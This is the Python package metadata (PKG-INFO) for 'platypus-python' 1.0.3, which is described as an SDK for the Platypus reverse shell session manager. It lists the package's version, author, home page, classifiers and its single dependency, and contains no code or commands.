Metadata-Version: 2.1
Name: platypus-python
Version: 1.0.3
Summary: Python SDK for reverse shell sessions manager - Platypus v1.4.1
Home-page: https://github.com/WangYihang/Platypus-Python
Author: Wang Yihang
Author-email: wangyihanger@gmail.com
License: UNKNOWN
Keywords: platypus,sdk,reverse shell
Platform: UNKNOWN
Classifier: Programming Language :: Python :: 3
Classifier: Operating System :: Microsoft :: Windows
Classifier: Development Status :: 5 - Production/Stable
Classifier: License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)
Classifier: Topic :: System :: Networking
Requires-Python: >=3.6
Requires-Dist: requests
